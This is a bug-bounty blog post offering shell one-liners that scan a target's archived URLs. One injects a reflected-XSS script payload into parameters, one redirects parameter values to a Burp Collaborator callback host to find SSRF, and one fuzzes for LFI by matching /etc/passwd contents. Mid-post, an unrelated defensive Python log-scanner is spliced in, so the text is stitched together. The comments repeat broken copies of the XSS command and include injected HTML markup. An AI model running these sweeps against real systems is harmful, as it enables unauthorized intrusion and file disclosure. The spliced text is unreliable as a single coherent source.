Find SSRF, LFI, XSS using httpx, waybackurls, gf, gau, qsreplace

Hello All

Today we will see how you can find SSRF, XSS and LFI using the gf, httpx, waybackurls, qsreplace and gau tools.

This will help you in bug bounty, because these are advanced bug bounty tips. I also have a YouTube channel; please visit it and watch the videos on advanced subdomain recon and subdomain takeover. Some PoC videos are there as well. So let's start.

XSS

First, let's find XSS. For this we will use these tools: gf, httpx, waybackurls and qsreplace. The command looks like this:

cat file.txt | gf xss | grep 'source=' | qsreplace '"><script>confirm(1)</script>' | while read -r host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable\n"; done

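This command finds reflected XSS on the target domain: a URL is reported as vulnerable when the payload comes back unencoded in the response. Confirm each hit by hand, since a reflected payload does not execute in every context.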

SSRF

Now let's see how we can find SSRF using these tools. Here is the command to find SSRF on the target URLs:

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net

This filters the URLs down to those that carry parameters, the possible SSRF candidates, and rewrites each parameter value so that the request goes to your Collaborator.

LFI

Use this command to find LFI:

findomain -t example.com -q | waybackurls | gf lfi | qsreplace FUZZ | while read -r url; do ffuf -u "$url" -mr "root:x" -w ~/wordlist/LFI.txt; done

Thanks 
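The three one-liners above leave recognizable traces in the target's access log, because qsreplace writes the same value into every query parameter. The following Python script is an added example, not code from the original post, that flags such requests; the log lines, hostnames, paths and label names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request target inside a combined-format access log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# One pattern per section of the post, matched against the URL-decoded parameter value.
CHECKS = {
    "xss": re.compile(r"<\s*script\b|javascript:", re.I),
    # Absolute URL as a value; legitimate redirect/callback parameters need an allowlist.
    "ssrf": re.compile(r"^\s*(?:https?|ftp|gopher|file)://", re.I),
    "lfi": re.compile(r"\.\.[/\\]|/etc/passwd", re.I),
}

def classify(request_target):
    """Return sorted labels for the probe classes found in the query string."""
    params = parse_qsl(urlsplit(request_target).query, keep_blank_values=True)
    hits = {label for _, value in params
            for label, pattern in CHECKS.items() if pattern.search(value)}
    # qsreplace sets every parameter to the same value; use that as corroboration.
    if hits and len(params) >= 2 and len({value for _, value in params}) == 1:
        hits.add("uniform-values")
    return sorted(hits)

def scan(log_lines):
    """Return (client_ip, request_target, labels) for each line with a hit."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        labels = classify(match.group(1))
        if labels:
            findings.append((line.split(" ", 1)[0], match.group(1), labels))
    return findings

# Constructed sample lines (documentation IP ranges, made-up paths and hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /search?source=%22%3E%3Cscript%3Econfirm%281%29%3C%2Fscript%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /fetch?url=http%3A%2F%2Fcollab.example.net&cb=http%3A%2F%2Fcollab.example.net HTTP/1.1" 200 90',
    '203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /view?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1204',
    '198.51.100.20 - - [10/Mar/2024:10:00:04 +0000] "GET /search?source=newsletter&page=2 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, target, labels in scan(SAMPLE_LOG):
        print(ip, ",".join(labels), target)
```

Many hits from one client within a short window, especially with the uniform-values label, point to an automated sweep rather than a single odd request.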

This Post Has 23 Comments

  1. Unknown

    <a href="https://youtu.be/cgZoVCQeAP0&quot; style="color:red; background:yellow; >Dear sir, your video and blog article is very good. Excellent. But <bold><center> this comment section is vulnerable to XSS </center></bold></a>

  2. adnan

    cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host 33[0;31mVulnerable\n”;done

    bash: syntax error near unexpected token `<‘
    Please help me!!

    1. mrblack

      It's because you have copy-pasted the command directly from here.

      Use this command:

      cat file.txt | gf xss | grep 'source=' | qsreplace '">confirm(1)' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033[0;31mVulnerable\n"; done

  3. Anil kumar

    zsh: parse error near `<‘
    It's showing this error.

  4. Anil kumar

    zsh: parse error near `<‘

  5. cyrus

    Getting an error while running the command: "no such pattern". Please, somebody help.

    1. admin

      Install the patterns from GitHub.

  6. dilip

    cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host \033[0;31mVulnerable\n”;done
    bash: syntax error near unexpected token `<‘

    1. admin

      Change your payload and try again.

  7. Hargun Singh

    I have tried so many payloads; the command is not working.
